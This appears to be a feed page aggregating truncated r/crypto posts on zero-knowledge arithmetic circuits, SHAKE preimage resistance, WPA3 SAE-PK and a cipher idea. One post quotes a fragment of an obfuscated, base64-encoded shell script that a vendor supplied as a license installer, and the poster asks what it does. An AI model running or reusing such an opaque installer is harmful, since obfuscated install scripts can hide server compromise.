Reddit » Cryptography News
116 FOLLOWERS
Cryptography is the art of creating mathematical guarantees for who can do what with data, including but not limited the classical example of encrypting messages so that only the key-holder can read it. This subreddit covers the theory and practice of *strong* cryptography, which lives at an intersection of math, programming, and computer science. This is a technical subreddit focused on the..
Reddit » Cryptography News
4d ago
Welcome to /r/crypto's weekly community thread!
This thread is a place where people can freely discuss broader topics (but NO cryptocurrency spam, see the sidebar), perhaps even share some memes (but please keep the worst offenses contained to /r/shittycrypto), engage with the community, discuss meta topics regarding the subreddit itself (such as discussing the customs and subreddit rules, etc), etc.
Keep in mind that the standard reddiquette rules still apply, i.e. be friendly and constructive!
So, what's on your mind? Comment below!
submitted by /u/AutoModerator
[visit reddit] [comments ..read more
Reddit » Cryptography News
4d ago
I followed the following blog post
https://medium.com/@VitalikButerin/quadratic-arithmetic-programs-from-zero-to-hero-f6d558cea649
You start with some problem f(y) = 0, where y is some group of values and f could be just about any problem, maybe 'find a set of values y_i for the squares in this Sudoku', or 'Hash(y) - hashVal'
You want to convince someone you know y without revealing it.
You convert f() into a 'recipe' of very steps, 'add y_a and y_b to get val1' then 'multiply val1 and y_b to get val2'.
List out those steps as a series of constraints:
y_a + y_b = val1
val1 * y_b = val2
etc.
N ..read more
Reddit » Cryptography News
4d ago
SHAKE’s security relies on the fact that 256 bits of the output are destroyed, and 256 bits of the input are fixed to 0 and cannot be chosen by the individual performing the hash.
F1600 is not uniquely invertible, it is nevertheless invertible: from an output, you can calculate some input that produces that output.
If you start from some hash, fill out the rest of the F1600 state arbitrarily and try to perform this inversion, you’ll get an input where the last 256 bits of the state are not 0 and so this input is not an allowed preimage.
The χ step of the inversion gives you freedom to set spe ..read more
Reddit » Cryptography News
6d ago
I've tried to buy a panel license from a vendor but it gave me a .sh file to run on my server. Inside the file there is the code below. What is it and what does it do?
gH4="Ed";kM0="xSz";c="ch";L="4";rQW="";fE1="lQ";s=" 'KkmZKEDJgUGdhRGcVNkUv4Wai9iczV3LgAiCuVGa0ByOdBiIiASPhAiIxQiIgsFImlmClRXYkBXVDJ1LulmYvI3c19CI4tCIk9WboNmCKkmZKEjJ+IDIsxWdu9idlR2Lg4DIvwWYj9GbvI3c19CIk1CIwlmeu4USCNkUvwWYj9GbvI3c19CIwlmeuVnCxYiPyACbsVnbvYXZk9CI+ACcppnLOlkQDJ1LylmLyVGduV2YyVGbsV2clJnLy9mcylWbv8iOzBHd0hGIwlmeu4USCNkUvwWYj9GbvI3c19CIP1CI0V2Z3pgblhGdK0FIOlkQDJ1LsF2Yvx2LyNXdvACZtASIgsFImlmCKkmZKISfD50ekAiLkVGbpFmZg ..read more
Reddit » Cryptography News
1w ago
I just learned about WPA3 SAE-PK, where Wi-Fi access points have a keypair, and the client can authenticate the access point using a digital signature. The signature can be verified because the public key's hash is part of the Wi-Fi password. This is meant to improve security in network where the Wi-Fi password is shared to many users and is basically public knowledge.
But what stops an attacker from setting up an AP without SAE-PK enabled, or even with WPA2? How does the client know the network is supposed to be protected by SAE-PK, if the only information it has is the SSID and the key, aka ..read more
Reddit » Cryptography News
1w ago
Welcome to /r/crypto's weekly community thread!
This thread is a place where people can freely discuss broader topics (but NO cryptocurrency spam, see the sidebar), perhaps even share some memes (but please keep the worst offenses contained to /r/shittycrypto), engage with the community, discuss meta topics regarding the subreddit itself (such as discussing the customs and subreddit rules, etc), etc.
Keep in mind that the standard reddiquette rules still apply, i.e. be friendly and constructive!
So, what's on your mind? Comment below!
submitted by /u/AutoModerator
[visit reddit] [comments ..read more
Reddit » Cryptography News
1w ago
Actually i thought of something very simple based on the following principle:
The function/algorithm which achieves defense against differential attacks must be different from the function/algorithm who uses the key.
Btw, this principle actually exist in AES (so it isn't really something new).Of course, the order in which this functions/algorithms are applied is: first, the one that achieves defense ; second, the ones that uses the key.The difference between this encryption system and AES would be that if the first function is positively provable than there is no need for multiple rounds.Firs ..read more